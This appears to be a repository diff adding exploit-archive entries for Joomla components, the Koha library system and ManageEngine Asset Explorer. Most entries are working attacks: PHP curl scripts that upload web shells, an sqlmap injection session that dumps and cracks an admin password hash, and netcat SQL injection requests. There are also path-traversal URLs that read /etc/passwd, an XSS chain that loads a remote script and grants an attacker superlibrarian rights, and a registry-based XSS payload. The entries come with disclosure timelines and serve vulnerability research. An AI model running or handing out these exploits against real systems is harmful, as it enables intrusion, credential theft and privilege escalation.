||||
|
||||
PostShell2.php
|
||||
|
||||
<?php
|
||||
|
||||
$uploadfile="lo.php.mpg3";
|
||||
|
||||
$ch =
|
||||
curl_init("http://www.example.com/components/com_dv/externals/swfupload/upload.php");
|
||||
curl_setopt($ch, CURLOPT_POST, true);
|
||||
curl_setopt($ch, CURLOPT_POSTFIELDS,
|
||||
array('Filedata'=>"@$uploadfile"));
|
||||
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
|
||||
$postResult = curl_exec($ch);
|
||||
curl_close($ch);
|
||||
|
||||
print "$postResult";
|
||||
|
||||
?>
|
||||
|
||||
Shell Access : http://www.example.com/dvvideos/uploads/originals/lo.php.mpg3
|
||||
|
||||
lo.php.mpg3
|
||||
<?php
|
||||
phpinfo();
|
||||
?>
|
21
platforms/php/webapps/37381.html
Executable file
21
platforms/php/webapps/37381.html
Executable file
|
@ -0,0 +1,21 @@
|
|||
source: http://www.securityfocus.com/bid/53973/info
|
||||
|
||||
The IDoEditor component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process.
|
||||
|
||||
IDoEditor 1.6.16 is vulnerable; other versions may also be affected.
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<center>
|
||||
<form
|
||||
action="http://www.example.com/plugins/editors/idoeditor/themes/advanced/php/image.php"
|
||||
method="post" enctype="multipart/form-data">
|
||||
<input type="file" name="pfile">
|
||||
<input type="submit" name="Submit" value="Upload">
|
||||
</form>
|
||||
</center>
|
||||
</body>
|
||||
</html>
|
||||
|
31
platforms/php/webapps/37382.php
Executable file
31
platforms/php/webapps/37382.php
Executable file
|
@ -0,0 +1,31 @@
|
|||
source: http://www.securityfocus.com/bid/53975/info
|
||||
|
||||
The jFancy component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
|
||||
|
||||
jFancy 2.03 is vulnerable; other versions may also be affected.
|
||||
|
||||
Exploit :
|
||||
|
||||
PostShell.php
|
||||
<?php
|
||||
|
||||
$uploadfile="lo.php.gif";
|
||||
$ch = curl_init("http://www.example.com/modules/mod_jfancy/script.php");
|
||||
curl_setopt($ch, CURLOPT_POST, true);
|
||||
curl_setopt($ch, CURLOPT_POSTFIELDS,
|
||||
array('photoupload'=>"@$uploadfile"));
|
||||
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
|
||||
$postResult = curl_exec($ch);
|
||||
curl_close($ch);
|
||||
print "$postResult";
|
||||
|
||||
?>
|
||||
|
||||
Shell Access : http://www.example.com/images/lo.php.gif
|
||||
|
||||
lo.php.gif
|
||||
<?php
|
||||
phpinfo();
|
||||
?>
|
28
platforms/php/webapps/37383.php
Executable file
28
platforms/php/webapps/37383.php
Executable file
|
@ -0,0 +1,28 @@
|
|||
source: http://www.securityfocus.com/bid/53977/info
|
||||
|
||||
The Easy Flash Uploader component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process.
|
||||
|
||||
Easy Flash Uploader 2.0 is vulnerable; other versions may also be affected.
|
||||
|
||||
<?php
|
||||
|
||||
$uploadfile="lo.php";
|
||||
|
||||
$ch =
|
||||
curl_init("http://www.example.com/plugins/content/efup_files/helper.php");
|
||||
curl_setopt($ch, CURLOPT_POST, true);
|
||||
curl_setopt($ch, CURLOPT_POSTFIELDS,
|
||||
array('Filedata'=>"@$uploadfile",
|
||||
'JPATH_BASE'=>'../../../',
|
||||
'filesize'=>'2000',
|
||||
'filetypes'=>'*.*',
|
||||
'mimetypes'=>"*",
|
||||
'destination'=>'./'));
|
||||
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
|
||||
$postResult = curl_exec($ch);
|
||||
curl_close($ch);
|
||||
print "$postResult";
|
||||
|
||||
?>
|
222
platforms/php/webapps/37387.txt
Executable file
222
platforms/php/webapps/37387.txt
Executable file
|
@ -0,0 +1,222 @@
|
|||
# Exploit Title: Koha Open Source ILS - Unauthenticated SQL Injection in OPAC
|
||||
# Google Dork:
|
||||
# Date: 25/06/2015
|
||||
# Exploit Author: Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos - Combinatorial Security Testing Group of SBA Research (cst@sba-research.org)
|
||||
# Vendor Homepage: koha-community.org
|
||||
# Software Link: https://github.com/Koha-Community/Koha
|
||||
# Version: 3.20.x <= 3.20.1, 3.18.x <= 3.18.8, 3.16.x <= 3.16.12
|
||||
# Tested on: Debian Linux
|
||||
# CVE : CVE-2015-4633
|
||||
|
||||
|
||||
|
||||
|
||||
### CVE-2015-4633 ###
|
||||
|
||||
#### Titel: ####
|
||||
Unauthenticated SQL Injection in Koha
|
||||
|
||||
#### Type of vulnerability: ####
|
||||
An Unauthenticated SQL Injection vulnerability in Koha allows attackers to read arbitrary data from the database.
|
||||
|
||||
##### Exploitation vector:
|
||||
The url parameter 'number' of the /cgi-bin/koha/opac-tags_subject.pl is vulnerable to SQLI.
|
||||
|
||||
##### Attack outcome:
|
||||
An attacker can read arbitrary data from the database. If the webserver is misconfigured, read & write access the filesystem may be possible.
|
||||
|
||||
#### Impact: ####
|
||||
critical
|
||||
|
||||
#### Software/Product name: ####
|
||||
Koha
|
||||
|
||||
#### Affected versions: ####
|
||||
* <= Koha 3.20.1
|
||||
* <= Koha 3.18.8
|
||||
* <= Koha 3.16.12
|
||||
|
||||
#### Fixed in version: ####
|
||||
* version 3.20.1 http://koha-community.org/security-release-koha-3-20-1/,
|
||||
* version 3.18.8 http://koha-community.org/security-release-koha-3-18-8/,
|
||||
* version 3.16.12 http://koha-community.org/security-release-koha-3-16-12/
|
||||
|
||||
#### Vendor: ####
|
||||
http://koha-community.org/ (Open Source)
|
||||
|
||||
#### CVE number: ####
|
||||
CVE-2015-4633
|
||||
|
||||
#### Timeline ####
|
||||
* `2015-06-18` identification of vulnerability
|
||||
* `2015-06-18` 1st contact to release maintainer, immediate reply
|
||||
* `2015-06-23` new release with fixed vulnerabilities
|
||||
|
||||
#### Credits: ####
|
||||
RGhanad-Tavakoli@sba-research.org
|
||||
---
|
||||
Vulnerability Disclosure by Combinatorial Security Testing Group of SBA Research.
|
||||
Contact: cst@sba-research.org
|
||||
|
||||
#### References:
|
||||
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412
|
||||
http://koha-community.org/security-release-koha-3-20-1/
|
||||
http://koha-community.org/security-release-koha-3-18-8/
|
||||
http://koha-community.org/security-release-koha-3-16-12/
|
||||
|
||||
#### Description: ####
|
||||
By manipulating the variable 'number' of the /cgi-bin/koha/opac-tags_subject.pl script the database can be accessed via time-based blind injections. If the webserver is misconfigured, the file-system can be accessed as well.
|
||||
|
||||
#### Proof-of-concept: ####
|
||||
1. Inspect Koha database schema
|
||||
|
||||
Have a look at how to query the database for superlibrarian users:
|
||||
http://wiki.koha-community.org/wiki/SQL_Reports_Library#Superlibrarians
|
||||
|
||||
So basically we we need to execute some SQL statement like this:
|
||||
sql-shell> select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;
|
||||
|
||||
2. Query the database with sqlmap
|
||||
|
||||
So let's fire up sqlmap with the --sql-shell parameter and input the query:
|
||||
|
||||
root@kali:/home/wicked# sqlmap -u http://testbox:9001/cgi-bin/koha/opac-tags_subject.pl?number=10 -p number --technique=T --dbms=MySQL --sql-shell --time-sec=4
|
||||
_
|
||||
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150513}
|
||||
|_ -| . | | | .'| . |
|
||||
|___|_ |_|_|_|_|__,| _|
|
||||
|_| |_| http://sqlmap.org
|
||||
|
||||
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
|
||||
|
||||
[*] starting at 09:20:07
|
||||
|
||||
[09:20:07] [INFO] testing connection to the target URL
|
||||
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
|
||||
---
|
||||
Parameter: number (GET)
|
||||
Type: AND/OR time-based blind
|
||||
Title: MySQL >= 5.1 time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE)
|
||||
Payload: number=1 PROCEDURE ANALYSE(EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(4000000,MD5(0x4b754a4b))))),1)
|
||||
---
|
||||
[09:20:09] [INFO] testing MySQL
|
||||
[09:20:09] [INFO] confirming MySQL
|
||||
[09:20:09] [INFO] the back-end DBMS is MySQL
|
||||
web server operating system: Linux Debian
|
||||
web application technology: Apache 2.4.10
|
||||
back-end DBMS: MySQL >= 5.0.0
|
||||
[09:20:09] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
|
||||
|
||||
sql-shell> select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;
|
||||
[09:20:25] [INFO] fetching SQL SELECT statement query output: 'select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1'
|
||||
[09:20:25] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
|
||||
[09:20:25] [WARNING] time-based comparison requires larger statistical model, please wait..............................
|
||||
[09:20:52] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
|
||||
admin
|
||||
[09:21:46] [INFO] retrieved: $2a$08$taQ
|
||||
[09:23:33] [ERROR] invalid character detected. retrying..
|
||||
[09:23:33] [WARNING] increasing time delay to 5 seconds
|
||||
afOgEEhU
|
||||
[09:25:10] [ERROR] invalid character detected. retrying..
|
||||
[09:25:10] [WARNING] increasing time delay to 6 seconds
|
||||
t/gW
|
||||
[09:26:13] [ERROR] invalid character detected. retrying..
|
||||
[09:26:13] [WARNING] increasing time delay to 7 seconds
|
||||
TOmqnYe1Y6ZNxCENa
|
||||
[09:29:57] [ERROR] invalid character detected. retrying..
|
||||
[09:29:57] [WARNING] increasing time delay to 8 seconds
|
||||
2.ONk2eZhnuEw5z9OjjxS
|
||||
[09:35:08] [ERROR] invalid character detected. retrying..
|
||||
[09:35:08] [WARNING] increasing time delay to 9 seconds
|
||||
|
||||
select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;:
|
||||
'admin, $2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS'
|
||||
|
||||
3. Feed john the ripper and be lucky
|
||||
|
||||
root@kali:/home/wicked# echo "$2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS" > ./admin-pass
|
||||
root@kali:/home/wicked# john ./admin-pass
|
||||
Loaded 1 password hash (OpenBSD Blowfish [32/64 X2])
|
||||
admin (?)
|
||||
guesses: 1 time: 0:00:00:10 DONE (Thu Jun 25 09:45:41 2015) c/s: 260 trying: Smokey - allstate
|
||||
Use the "--show" option to display all of the cracked passwords reliably
|
||||
|
||||
root@kali:/home/wicked# john ./admin-pass --show
|
||||
?:admin
|
||||
|
||||
1 password hash cracked, 0 left
|
||||
|
||||
|
||||
4. Log in with username "admin" and password "admin" ;)
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
### CVE-2015-xxxx ###
|
||||
|
||||
#### Titel: ####
|
||||
Unauthenticated SQL Injection
|
||||
|
||||
#### Type of vulnerability: ####
|
||||
SQL Injection vulnerabilities in Koha staff client allows attackers to read arbitrary data from the database.
|
||||
|
||||
##### Exploitation vector:
|
||||
The url parameter 'number' of the /cgi-bin/koha/opac-tags_subject.pl is vulnerable to SQLI.
|
||||
|
||||
##### Attack outcome:
|
||||
An attacker can read arbitrary data from the database. If the webserver is misconfigured, read & write access to the filesystem is possible.
|
||||
|
||||
#### Impact: ####
|
||||
critical
|
||||
|
||||
#### Software/Product name: ####
|
||||
Koha
|
||||
|
||||
#### Affected versions: ####
|
||||
* <= Koha 3.20.1
|
||||
* <= Koha 3.18.8
|
||||
* <= Koha 3.16.12
|
||||
|
||||
#### Fixed in version: ####
|
||||
* version 3.20.1 http://koha-community.org/security-release-koha-3-20-1/,
|
||||
* version 3.18.8 http://koha-community.org/security-release-koha-3-18-8/,
|
||||
* version 3.16.12 http://koha-community.org/security-release-koha-3-16-12/
|
||||
|
||||
#### Vendor: ####
|
||||
http://koha-community.org/ (Open Source)
|
||||
|
||||
#### CVE number: ####
|
||||
CVE-2015-xxxx
|
||||
|
||||
#### Timeline ####
|
||||
* `2015-06-18` identification of vulnerability
|
||||
* `2015-06-18` 1st contact to release maintainer, immediate reply
|
||||
* `2015-06-23` new release with fixed vulnerabilities
|
||||
|
||||
#### Credits: ####
|
||||
RGhanad-Tavakoli@sba-research.org
|
||||
---
|
||||
Vulnerability Disclosure by Combinatorial Security Testing Group of SBA Research.
|
||||
Contact: cst@sba-research.org
|
||||
|
||||
#### References:
|
||||
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426
|
||||
http://koha-community.org/security-release-koha-3-20-1/
|
||||
http://koha-community.org/security-release-koha-3-18-8/
|
||||
http://koha-community.org/security-release-koha-3-16-12/
|
||||
|
||||
#### Description: ####
|
||||
By manipulating the variable 'number' of the /cgi-bin/koha/opac-tags_subject.pl script the database can be accessed via time-based blind injections. If the webserver is misconfigured, the file-system can be accessed as well.
|
||||
|
||||
#### Proof-of-concept: ####
|
||||
echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=2,'evil')" | nc testbox 9002
|
||||
|
||||
echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=1,'evil')" | nc testbox 9002
|
||||
|
||||
|
74
platforms/php/webapps/37388.txt
Executable file
74
platforms/php/webapps/37388.txt
Executable file
|
@ -0,0 +1,74 @@
|
|||
# Exploit Title: Koha Open Source ILS - Path Traversal in STAFF client
|
||||
# Google Dork:
|
||||
# Date: 25/06/2015
|
||||
# Exploit Author: Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos - Combinatorial Security Testing Group of SBA Research (cst@sba-research.org)
|
||||
# Vendor Homepage: koha-community.org
|
||||
# Software Link: https://github.com/Koha-Community/Koha
|
||||
# Version: 3.20.x <= 3.20.1, 3.18.x <= 3.18.8, 3.16.x <= 3.16.12
|
||||
# Tested on: Debian Linux
|
||||
# CVE : CVE-2015-4632
|
||||
|
||||
|
||||
|
||||
### CVE-2015-4632 ###
|
||||
|
||||
#### Titel: ####
|
||||
Directory traversal
|
||||
|
||||
#### Type of vulnerability: ####
|
||||
File Path Traversal
|
||||
|
||||
##### Exploitation vector:
|
||||
Injecting into the "template_path" parmeter in /cgi-bin/koha/svc/members/search and /cgi-bin/koha/svc/members/search
|
||||
|
||||
##### Attack outcome:
|
||||
Read access to arbitrary files on the system
|
||||
|
||||
#### Impact: ####
|
||||
{low,medium,high,critical}
|
||||
high
|
||||
|
||||
#### Software/Product name: ####
|
||||
Koha
|
||||
|
||||
#### Affected versions: ####
|
||||
* <= Koha 3.20.1
|
||||
* <= Koha 3.18.8
|
||||
* <= Koha 3.16.12
|
||||
|
||||
#### Fixed in version: ####
|
||||
* version 3.20.1 http://koha-community.org/security-release-koha-3-20-1/,
|
||||
* version 3.18.8 http://koha-community.org/security-release-koha-3-18-8/,
|
||||
* version 3.16.12 http://koha-community.org/security-release-koha-3-16-12/
|
||||
|
||||
#### Vendor: ####
|
||||
http://koha-community.org/ (Open Source)
|
||||
|
||||
#### CVE number: ####
|
||||
CVE-2015-4632
|
||||
|
||||
#### Timeline ####
|
||||
* `2015-06-18` identification of vulnerability
|
||||
* `2015-06-18` 1st contact to release maintainer, immediate reply
|
||||
* `2015-06-23` new release with fixed vulnerabilities
|
||||
|
||||
#### Credits: ####
|
||||
RGhanad-Tavakoli@sba-research.org
|
||||
---
|
||||
Vulnerability Disclosure by Combinatorial Security Testing Group of SBA Research.
|
||||
Contact: cst@sba-research.org
|
||||
|
||||
#### References:
|
||||
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408
|
||||
http://koha-community.org/security-release-koha-3-20-1/
|
||||
http://koha-community.org/security-release-koha-3-18-8/
|
||||
http://koha-community.org/security-release-koha-3-16-12/
|
||||
|
||||
#### Description: ####
|
||||
Multiple directory traversal vulnerabilities allow remote attackers to read arbitrary files via a .. (dot dot) in (1) /cgi-bin/koha/svc/virtualshelves/search and (2) in /cgi-bin/koha/svc/members/search
|
||||
|
||||
#### Proof-of-concept: ####
|
||||
/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
|
||||
|
||||
/cgi-bin/koha/svc/members/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
|
||||
|
117
platforms/php/webapps/37389.txt
Executable file
117
platforms/php/webapps/37389.txt
Executable file
|
@ -0,0 +1,117 @@
|
|||
# Exploit Title: Koha Open Source ILS - Multiple XSS and XSRF Vulnerabilities
|
||||
# Google Dork:
|
||||
# Date: 25/06/2015
|
||||
# Exploit Author: Raschin Tavakoli, Bernhard Garn, Peter Aufner and Dimitris Simos - Combinatorial Security Testing Group of SBA Research (cst@sba-research.org)
|
||||
# Vendor Homepage: koha-community.org
|
||||
# Software Link: https://github.com/Koha-Community/Koha
|
||||
# Version: 3.20.x <= 3.20.1, 3.18.x <= 3.18.8, 3.16.x <= 3.16.12
|
||||
# Tested on: Debian Linux
|
||||
# CVE : CVE-2015-4630, CVE-2015-4631
|
||||
|
||||
|
||||
### CVE-2015-4631 ###
|
||||
|
||||
#### Titel: ####
|
||||
Multiple XSS and XSRF vulnerabilities in Koha
|
||||
|
||||
#### Type of vulnerability: ####
|
||||
Koha suffers from multiple critical XSS and XSRF vulnerabilities
|
||||
|
||||
##### Exploitation vector:
|
||||
The attack can be performed through a compromised user account (for example previous password retrieval if student user acoount through SQLI - CVE-2015-4633) or due to user that clicks on a malicious link (for example in a phishing mail, forum link etc)
|
||||
|
||||
##### Attack outcome:
|
||||
1. An attacker may escalate privileges and even gain superlibrarian permissions.
|
||||
2. An attacker may target other users by stealing session tokens, impersonating them or exploiting browser vulnerabilities to gain access on their machines.
|
||||
3. Perform unauthorized actions with the permissions of a staff member
|
||||
4. Exploit other known server-side vulnerabilities (see CVE-2015-4633 and CVE-2015-4632) to fully compromise the websever
|
||||
|
||||
#### Impact: ####
|
||||
{low,medium,high,critical}
|
||||
critical
|
||||
|
||||
#### Software/Product name: ####
|
||||
Koha
|
||||
|
||||
#### Affected versions: ####
|
||||
* <= Koha 3.20.1
|
||||
* <= Koha 3.18.8
|
||||
* <= Koha 3.16.12
|
||||
|
||||
#### Fixed in version: ####
|
||||
* version 3.20.1 http://koha-community.org/security-release-koha-3-20-1/,
|
||||
* version 3.18.8 http://koha-community.org/security-release-koha-3-18-8/,
|
||||
* version 3.16.12 http://koha-community.org/security-release-koha-3-16-12/
|
||||
|
||||
#### Vendor: ####
|
||||
http://koha-community.org/ (Open Source)
|
||||
|
||||
#### CVE number: ####
|
||||
CVE-2015-4631
|
||||
|
||||
#### Timeline ####
|
||||
* `2015-06-18` identification of vulnerability
|
||||
* `2015-06-18` 1st contact to release maintainer, immediate reply
|
||||
* `2015-06-23` new release with fixed vulnerabilities
|
||||
|
||||
#### Credits: ####
|
||||
RGhanad-Tavakoli@sba-research.org
|
||||
---
|
||||
Vulnerability Disclosure by Combinatorial Security Testing Group of SBA Research.
|
||||
Contact: cst@sba-research.org
|
||||
|
||||
#### References:
|
||||
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416
|
||||
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423
|
||||
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418
|
||||
|
||||
http://koha-community.org/security-release-koha-3-20-1/
|
||||
http://koha-community.org/security-release-koha-3-18-8/
|
||||
http://koha-community.org/security-release-koha-3-16-12/
|
||||
|
||||
#### Description: ####
|
||||
Koha suffers from various critical XSS and XSRF vulnerabilities due to imprope input validation. The site also lacks in the implementation of challenge tokens that prevent cross-site forgery (XSRF) attacks. This allows remote remote attackers to inject arbitrary web script or HTML and completely compromise the webpage.
|
||||
|
||||
The following pages are affected from stored XSS flaws:
|
||||
|
||||
/cgi-bin/koha/opac-shelves.pl
|
||||
/cgi-bin/koha/virtualshelves/shelves.pl
|
||||
|
||||
The following pages are affected from relfective XSS flaws:
|
||||
|
||||
/cgi-bin/koha/opac-shelves.pl (parameters: "direction", "display")
|
||||
/cgi-bin/koha/opac-search.pl (parameters: "tag")
|
||||
/cgi-bin/koha/authorities/authorities-home.pl (parameters: "value")
|
||||
/cgi-bin/koha/acqui/lateorders.pl (parameters: "delay")
|
||||
/cgi-bin/koha/admin/auth_subfields_structure.pl (parameters: "authtypecode","tagfield")
|
||||
/cgi-bin/koha/admin/marc_subfields_structure.pl (parameters: "tagfield")
|
||||
/cgi-bin/koha/catalogue/search.pl (parameters: "limit")
|
||||
/cgi-bin/koha/serials/serials-search.pl (parameters: "bookseller_filter", "callnumber_filter", "EAN_filter", "ISSN_filter", "publisher_filter", "title_filter")
|
||||
/cgi-bin/koha/suggestion/suggestion.pl (parameters: "author", "collectiontitle", "copyrightdate", "isbn", "manageddate_from", "manageddate_to", "publishercode", "suggesteddate_from", "suggesteddate_to")
|
||||
|
||||
#### Proof-of-concept: ####
|
||||
Attack scenario:
|
||||
|
||||
Alice, a student with restricted permissions on the system, receives a phishing mail (or reads in some forum) and clicks the following link:
|
||||
|
||||
http://<opac-interface>/cgi-bin/koha/opac-shelves.pl?shelves=1&addshelf=Malicious+Input+<script+src='http://cst.sba-research.org/x.js'/>&sortfield=title&category=2&allow_add=0&allow_delete_own=1&allow_delete_other=0
|
||||
|
||||
Bob, library admin, recognizes the new malicious list entry. He logs into the staff area and browses the public lists in order to delete the entry. Once he opens
|
||||
|
||||
http://<staff-interface>/cgi-bin/koha/virtualshelves/shelves.pl
|
||||
|
||||
the malcious code get's executed. The code can then perform any unauthorized actions with the pemissions of user bob. For example:
|
||||
|
||||
Create new user:
|
||||
|
||||
http://testbox:9002/cgi-bin/koha/members/memberentry.pl?nodouble=&destination=&check_member=&borrowernumber=&nodouble=&title=&firstname=&othernames=&sex=&streetnumber=&streettype=&address2=&city=&state=&zipcode=&country=&phone=&phonepro=&mobile=&email=&emailpro=&fax=&B_address=&B_address2=&B_city=&B_state=&B_zipcode=&B_country=&B_phone=&B_email=&contactnote=&altcontactsurname=&altcontactfirstname=&altcontactaddress1=&altcontactaddress2=&altcontactaddress3=&altcontactstate=&altcontactzipcode=&altcontactcountry=&altcontactphone=&sort1=&sort2=&dateexpiry=&opacnote=&borrowernotes=&patron_attr_1=&BorrowerMandatoryField=surname%7Cdateofbirth%7Ccardnumber%7Caddress&category_type=A&updtype=I&op=insert&surname=hacker&dateofbirth=10%2F06%2F2000&address=fictional&select_city=%7C%7C%7C&cardnumber=9182734629182364&branchcode=MAURES&categorycode=P_COM&dateenrolled=24%2F06%2F2015&userid=hacker&password=hacker&password2=hacker&patron_attr_1_code=PROFESSION&setting_messaging_prefs=1&modify=yes&borrowernumber=&save=Save&setting_extended_patron_attributes=1
|
||||
|
||||
Give the new user superlibririan permission:
|
||||
|
||||
http://testbox:9002/testbox:9002/cgi-bin/koha/members/member-flags.pl?member=7855&newflags=1&flag=superlibrarian
|
||||
|
||||
The attacker can now log as superlibrarian.
|
||||
|
||||
Side Note: In order to make the attack work, alice needs to be logged in to the Open Public Catalog interface at the time of when clicking the malicious link.
|
||||
Alice needs to have access to the OPAC interface and to have permissions to create public lists.
|
||||
|
99
platforms/windows/webapps/37395.txt
Executable file
99
platforms/windows/webapps/37395.txt
Executable file
|
@ -0,0 +1,99 @@
|
|||
Title:
|
||||
===============
|
||||
ManageEngine Asset Explorer v6.1 - XSS Vulnerability
|
||||
|
||||
|
||||
CVE-ID:
|
||||
====================================
|
||||
CVE-2015-2169
|
||||
|
||||
|
||||
CVSS:
|
||||
====================================
|
||||
3.5
|
||||
|
||||
|
||||
Product & Service Introduction (Taken from their homepage):
|
||||
====================================
|
||||
ManageEngine AssetExplorer is a web-based IT Asset Management (ITAM)
|
||||
software that helps you monitor and manage assets in your network from
|
||||
Planning phase to Disposal phase. AssetExplorer provides you with a number
|
||||
of ways to ensure discovery of all the assets in your network. You can
|
||||
manage software & hardware assets, ensure software license compliance and
|
||||
track purchase orders & contracts - the whole nine yards! AssetExplorer is
|
||||
very easy to install and works right out of the box.
|
||||
|
||||
(Homepage: https://www.manageengine.com/products/asset-explorer/ )
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
Cross site scripting attack can be performed on the manage engine asset
|
||||
explorer. If the 'publisher' name contains vulnerable script, it gets
|
||||
executed in the browser.
|
||||
|
||||
|
||||
Affected Products:
|
||||
====================
|
||||
Manage Engine
|
||||
Product: Asset Explorer - Web Application 6.1.0 (Build 6112)
|
||||
|
||||
|
||||
Severity Level:
|
||||
====================
|
||||
Medium
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
Add a vendor with a script in it to the registry.
|
||||
Login to the product,
|
||||
Scan the endpoint where the registry is modified.
|
||||
In the right pane, go to software->Scanned Software
|
||||
|
||||
The script gets executed.
|
||||
|
||||
Vulnerable Product(s):
|
||||
ManageEngine Asset Explorer
|
||||
|
||||
Affected Version(s):
|
||||
Version 6.1.0 / Build Number 6112
|
||||
(Earlier versions i did not test)
|
||||
|
||||
Vulnerability Type(s):
|
||||
Persistent Cross Site Scripting
|
||||
|
||||
|
||||
PoC:
|
||||
=======================
|
||||
Add the following registry entry in the machine, for targeted attack.
|
||||
|
||||
Windows Registry Editor Version 5.00
|
||||
|
||||
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fake_Software]
|
||||
"DisplayName"="A fake software 2 installed"
|
||||
"UninstallString"="C:\\Program Files\\fake\\uninst.exe"
|
||||
"DisplayVersion"="0.500.20"
|
||||
"URLInfoAbout"="http://www.dummy.org"
|
||||
"Publisher"="<script> alert(\"XSS\"); </script>"
|
||||
|
||||
|
||||
Security Risk:
|
||||
==================
|
||||
Medium.
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Suraj Krishnaswami (suraj.krishnaswami@gmail.com)
|
||||
|
||||
|
||||
Timeline:
|
||||
==================
|
||||
Discovered at Wed, March 3, 2015
|
||||
Informed manage engine about the vulnerability: March 4, 2015
|
||||
Case moved to development team: March 4, 2015
|
||||
Asked for updates: March 9, 2015
|
||||
Asked for updates: March 13, 2015
|
||||
Asked for updates: April 14, 2015
|
||||
Public Disclosure at Mon, June 22, 2015
|
Loading…
Add table
Reference in a new issue